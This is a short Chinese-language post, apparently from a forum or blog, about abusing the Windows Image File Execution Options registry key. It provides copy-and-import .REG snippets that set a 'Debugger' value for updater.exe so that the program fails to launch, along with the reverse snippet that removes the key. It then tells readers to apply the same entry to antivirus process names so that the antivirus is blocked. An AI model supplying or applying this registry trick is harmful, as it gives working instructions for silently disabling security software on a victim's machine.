映像劫持杀毒软件
原理就这样了
下面是我做的注册表导入命令,把下面的命令粘贴到新的TXT文档中,另存为.REG后缀就行了,双击导入就行了
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe]
"Debugger"="125.exe"
如果要恢复的话,就导入下面的命令就行
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe]
"Debugger"="125.exe"
就多一个减号
其实要反病毒的镜像劫持的话,原理跟上面一样的
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\杀软的进程]
"Debugger"="125.exe"
举一反三就行了!
网友评论